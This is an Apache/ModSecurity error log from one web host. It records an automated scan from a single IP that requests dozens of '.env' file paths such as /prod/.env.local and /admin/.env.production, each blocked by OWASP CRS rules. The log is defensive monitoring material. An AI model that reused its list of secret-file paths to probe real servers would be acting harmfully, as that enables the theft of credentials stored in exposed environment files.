[Thu Jan 08 21:18:23.576224 2026] [:error] [pid 1270041] [client 18.119.100.98:37814] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "aWARD83GwEx_BV8-CrWUUAAAAAU"]
[Thu Jan 08 21:18:23.576381 2026] [:error] [pid 1270041] [client 18.119.100.98:37814] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "aWARD83GwEx_BV8-CrWUUAAAAAU"]
[Thu Jan 08 21:18:23.925483 2026] [:error] [pid 1270042] [client 18.119.100.98:37920] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "aWARDy7RlX2cRjHcFz6xzAAAAAY"]
[Thu Jan 08 21:18:23.925707 2026] [:error] [pid 1270042] [client 18.119.100.98:37920] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "aWARDy7RlX2cRjHcFz6xzAAAAAY"]
[Thu Jan 08 21:18:23.925871 2026] [:error] [pid 1270042] [client 18.119.100.98:37920] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "aWARDy7RlX2cRjHcFz6xzAAAAAY"]
[Thu Jan 08 21:18:24.273334 2026] [:error] [pid 1283304] [client 18.119.100.98:38036] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "aWAREGAwUIZgFNkik8yVRwAAAAg"]
[Thu Jan 08 21:18:24.273547 2026] [:error] [pid 1283304] [client 18.119.100.98:38036] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "aWAREGAwUIZgFNkik8yVRwAAAAg"]
[Thu Jan 08 21:18:24.273705 2026] [:error] [pid 1283304] [client 18.119.100.98:38036] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "aWAREGAwUIZgFNkik8yVRwAAAAg"]
[Thu Jan 08 21:18:24.621526 2026] [:error] [pid 1270036] [client 18.119.100.98:38132] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWAREOM1154Q6b0hewij8AAAAAE"]
[Thu Jan 08 21:18:24.621747 2026] [:error] [pid 1270036] [client 18.119.100.98:38132] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWAREOM1154Q6b0hewij8AAAAAE"]
[Thu Jan 08 21:18:24.621911 2026] [:error] [pid 1270036] [client 18.119.100.98:38132] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWAREOM1154Q6b0hewij8AAAAAE"]
[Thu Jan 08 21:18:24.968867 2026] [:error] [pid 1270037] [client 18.119.100.98:38240] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aWAREOA_IfWyU2EIiRhOkAAAAAI"]
[Thu Jan 08 21:18:24.969085 2026] [:error] [pid 1270037] [client 18.119.100.98:38240] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aWAREOA_IfWyU2EIiRhOkAAAAAI"]
[Thu Jan 08 21:18:24.969251 2026] [:error] [pid 1270037] [client 18.119.100.98:38240] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aWAREOA_IfWyU2EIiRhOkAAAAAI"]
[Thu Jan 08 21:18:25.314089 2026] [:error] [pid 1280390] [client 18.119.100.98:38346] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "aWAREdKTJIy7S9W5nL2LSwAAAAk"]
[Thu Jan 08 21:18:25.314437 2026] [:error] [pid 1280390] [client 18.119.100.98:38346] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "aWAREdKTJIy7S9W5nL2LSwAAAAk"]
[Thu Jan 08 21:18:25.314678 2026] [:error] [pid 1280390] [client 18.119.100.98:38346] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "aWAREdKTJIy7S9W5nL2LSwAAAAk"]
[Thu Jan 08 21:18:25.658590 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:38436] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Thu Jan 08 21:18:26.005821 2026] [:error] [pid 1270039] [client 18.119.100.98:38556] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "aWAREpccQYhM1DUhi_W7FQAAAAQ"]
[Thu Jan 08 21:18:26.006036 2026] [:error] [pid 1270039] [client 18.119.100.98:38556] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "aWAREpccQYhM1DUhi_W7FQAAAAQ"]
[Thu Jan 08 21:18:26.006192 2026] [:error] [pid 1270039] [client 18.119.100.98:38556] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "aWAREpccQYhM1DUhi_W7FQAAAAQ"]
[Thu Jan 08 21:18:26.353487 2026] [:error] [pid 1270043] [client 18.119.100.98:38652] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "aWAREgvEr1EpOYnVfM6r0AAAAAc"]
[Thu Jan 08 21:18:26.353708 2026] [:error] [pid 1270043] [client 18.119.100.98:38652] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "aWAREgvEr1EpOYnVfM6r0AAAAAc"]
[Thu Jan 08 21:18:26.353858 2026] [:error] [pid 1270043] [client 18.119.100.98:38652] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "aWAREgvEr1EpOYnVfM6r0AAAAAc"]
[Thu Jan 08 21:18:26.699817 2026] [:error] [pid 1270035] [client 18.119.100.98:38740] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "aWAREiYqm_i2BUcmtQb4xQAAAAA"]
[Thu Jan 08 21:18:26.700030 2026] [:error] [pid 1270035] [client 18.119.100.98:38740] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "aWAREiYqm_i2BUcmtQb4xQAAAAA"]
[Thu Jan 08 21:18:26.700201 2026] [:error] [pid 1270035] [client 18.119.100.98:38740] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "aWAREiYqm_i2BUcmtQb4xQAAAAA"]
[Thu Jan 08 21:18:27.047874 2026] [:error] [pid 1270041] [client 18.119.100.98:38828] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "aWARE83GwEx_BV8-CrWUUQAAAAU"]
[Thu Jan 08 21:18:27.048114 2026] [:error] [pid 1270041] [client 18.119.100.98:38828] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "aWARE83GwEx_BV8-CrWUUQAAAAU"]
[Thu Jan 08 21:18:27.048271 2026] [:error] [pid 1270041] [client 18.119.100.98:38828] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "aWARE83GwEx_BV8-CrWUUQAAAAU"]
[Thu Jan 08 21:18:27.392000 2026] [:error] [pid 1270042] [client 18.119.100.98:38942] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aWAREy7RlX2cRjHcFz6xzQAAAAY"]
[Thu Jan 08 21:18:27.392228 2026] [:error] [pid 1270042] [client 18.119.100.98:38942] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aWAREy7RlX2cRjHcFz6xzQAAAAY"]
[Thu Jan 08 21:18:27.392380 2026] [:error] [pid 1270042] [client 18.119.100.98:38942] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "aWAREy7RlX2cRjHcFz6xzQAAAAY"]
[Thu Jan 08 21:18:27.736599 2026] [:error] [pid 1283304] [client 18.119.100.98:39046] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "aWARE2AwUIZgFNkik8yVSAAAAAg"]
[Thu Jan 08 21:18:27.736821 2026] [:error] [pid 1283304] [client 18.119.100.98:39046] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "aWARE2AwUIZgFNkik8yVSAAAAAg"]
[Thu Jan 08 21:18:27.737006 2026] [:error] [pid 1283304] [client 18.119.100.98:39046] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "aWARE2AwUIZgFNkik8yVSAAAAAg"]
[Thu Jan 08 21:18:28.081868 2026] [authz_core:error] [pid 1270036] [client 18.119.100.98:39152] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Thu Jan 08 21:18:28.431179 2026] [:error] [pid 1270037] [client 18.119.100.98:39248] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "aWARFOA_IfWyU2EIiRhOkQAAAAI"]
[Thu Jan 08 21:18:28.431387 2026] [:error] [pid 1270037] [client 18.119.100.98:39248] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "aWARFOA_IfWyU2EIiRhOkQAAAAI"]
[Thu Jan 08 21:18:28.431560 2026] [:error] [pid 1270037] [client 18.119.100.98:39248] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "aWARFOA_IfWyU2EIiRhOkQAAAAI"]
[Thu Jan 08 21:18:28.778266 2026] [:error] [pid 1280390] [client 18.119.100.98:39348] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "aWARFNKTJIy7S9W5nL2LTAAAAAk"]
[Thu Jan 08 21:18:28.778506 2026] [:error] [pid 1280390] [client 18.119.100.98:39348] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "aWARFNKTJIy7S9W5nL2LTAAAAAk"]
